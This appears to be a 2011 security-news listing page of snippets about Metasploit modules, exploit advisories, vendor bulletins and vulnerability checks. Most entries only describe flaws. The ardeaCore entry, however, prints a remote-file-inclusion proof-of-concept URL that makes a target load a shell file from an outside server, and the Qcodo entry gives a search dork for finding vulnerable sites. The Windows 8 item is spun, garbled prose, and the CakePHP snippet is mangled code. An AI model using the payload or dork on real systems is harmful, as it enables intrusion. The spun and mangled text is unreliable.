VSFTPD 2.3.4 Backdoor Command Execution

$Id: vsftpd234backdoor.rb 13093 2011-07-04 20:09:32Z hdm $ This file is part of the Metasploit Framework and may be subject to redistribution and commercial restrictions. Please see the Metasploit Framework web site for more information on licensing and terms of use...

[SECURITY] Fedora 15 Update: gjs-0.7.14-6.fc15

Gjs allows using GNOME libraries from Javascript. It's based on the Spidermonkey Javascript engine from Mozilla and the GObject introspection framework...

Metasploit Framework 3.7.2 Released - Download

Metasploit Framework 3.7.2 Released - Download Metasploit Framework 3.7.2 includes 698 exploit modules, 358 auxiliary modules, and 54 post modules, 11 new exploits, 1 new auxiliary module, and 15 new post modules.This release addresses several issues with updating the framework, adds 11 exploit /...

Joomla A Cool Debate 1.0.3 Local File Inclusion

A Cool Debate 1.0.3 Component Joomla Local File Inclusion ========================================================================================= - Discovered by : Chip D3 Bi0s - Email : chipdebiosatgmaildotcom - Group : LatinHackTeam - Date : 18 june 2011 - Where : From Remote...

Metasploit Framework 3.7.1 Released !

Metasploit Framework 3.7.1 Released ! Statistics Metasploit now ships with 687 exploit modules, 357 auxiliary modules, and 39 post modules. 2 new exploits and 2 new auxiliary modules have been added since the last release. Highlights & New Features This release address a performance issue with HT...

Java floating-point value denial of service vulnerability Hazard Analysis-vulnerability warning-the black bar safety net

| By emptiness prodigal heart http://www.inbreak.net/ JAVA a vulnerability, the CVE-2 0 1 0-4 4 7 6, will result in a denial of service attack. Everyone from the Bulletin, to see such a piece of code, quite long. Meaning only the developers to write such code only on the server. We certainly will...

Important: Red Hat Security Advisory: jboss-seam2 security update

Updated jboss-seam2 packages that fix one security issue are now available for JBoss Enterprise Application Platform 4.3 for Red Hat Enterprise Linux 4 and 5. The Red Hat Security Response Team has rated this update as having important security impact. A Common Vulnerability Scoring System CVSS...

CVE-2011-1714

The vulnerability is an XSS in QooxDoo’s jsonp_primitive.php (framework/source/resource/qx/test/jsonp_primitive.php) affecting QooxDoo 1.3 and possibly other versions, as used by eyeOS 2.2/2.3. The underlying issue is reflected script injection via the callback parameter. Current documents do not...

Fedora Update for mono-addins FEDORA-2011-3393

Check for the Version of mono-addins OpenVAS Vulnerability Test Fedora Update for mono-addins FEDORA-2011-3393 Authors: System Generated Check Copyright: Copyright c 2011 Greenbone Networks GmbH, http://www.greenbone.net This program is free software; you can redistribute it and/or modify it unde...

Trend Micro Message Routing Framework Detection

Binary data trendmicromrfdetect.nbin...

Metasploit Framework Detection (Windows SMB Login)

This script finds the installed Metasploit Framework version. The script logs in via smb, searches for Metasploit in the registry and gets the version from SPDX-FileCopyrightText: 2011 Greenbone AG Some text descriptions might be excerpted from a referenced sources, and are Copyright C by the...

CVE-2011-1056

Metasploit Framework Local Privilege Escalation (CVE-2011-1056): on Windows, the Metasploit installer uses weak inherited permissions for the installation directory, enabling local users to replace critical files with a Trojan horse and gain privileges. Based on NVD/OpenVAS records, this is a loc...

DSA-2163-1 python-django - multiple

Bulletin has no description...

Qcodo Development Framework 0.3.3 Information Disclosure

Exploit Title: Qcodo Development Framework 0.3.3 Full Info Disclosure Google Dork: allintext: /qcodo/devtools/codegen.php Date: 5/02/2011 Author: Daniel Godoy Author Mail: DanielGodoyatGobiernoFederaldotcom Author Web: www.delincuentedigital.com.ar Software Link: http://www.qcodo.com/ Version: Al...

All about Microsoft Windows 8 !

Only Microsoft knows how the abutting adaptation of its Windows operating arrangement will attending and what it will be called, but big changes could be advanced for the OS that assemblage accredit to as "Windows 8." At this year's Consumer Electronics Appearance in Las Vegas, Microsoft appear...

CakePHP 1.3.5/1.2.8 - 'Unserialize()' File Inclusion

Source: http://securityreason.com/securityalert/8026 CakePHP data; $token = urldecode$check'Token''fields'; if strpos$token, ':' list$token, $locked = explode':', $token, 2; $locked = unserializestrrot13$locked; -- snip -- The $check array contains our POST data and $locked is a simple rot-13...

ardeaCore 2.25 - PHP Framework Remote File Inclusion

ardeaCore 2.25 - PHP Framework Remote File Inclusion ! Discovered: n0n0x ! Homepage: http://priasantai.uni.cc/ ! Remote: yes Hello gay x PoC: http://host/ardeaCorev2.25/ardeaCore/lib/core/ardeaInit.php?pathForArdeaCore=http://server/shell.tmp???...

Microsoft WMI Administration Tools ActiveX Buffer Overflow

$Id: wmiadmintools.rb 11405 2010-12-23 01:36:54Z jduck $ This file is part of the Metasploit Framework and may be subject to redistribution and commercial restrictions. Please see the Metasploit Framework web site for more information on licensing and terms of use. http://metasploit.com/framework...

Experts: OpenBSD Backdoor Allegations 'Almost Certainly False'

The incredible allegations that developers working under the auspices of the FBI and Justice Department planted a backdoor in the IPSec stack of the OpenBSD operating system are likely just that, experts say: not credible. “There is no way that the FBI paid anyone to create backdoors in OpenBSD a...

Apache Struts2 XWork ParameterInterceptor security bypass

Added: 08/05/2010 CVE: CVE-2010-1870 BID: 41592 OSVDB: 66280 Background Apache Struts is a Java web application framework. Apache Struts version 2 is based on WebWork 2. WebWork 2 uses XWork to invoke actions based on HTTP parameter names. The ParameterInterceptor component of XWork runs the...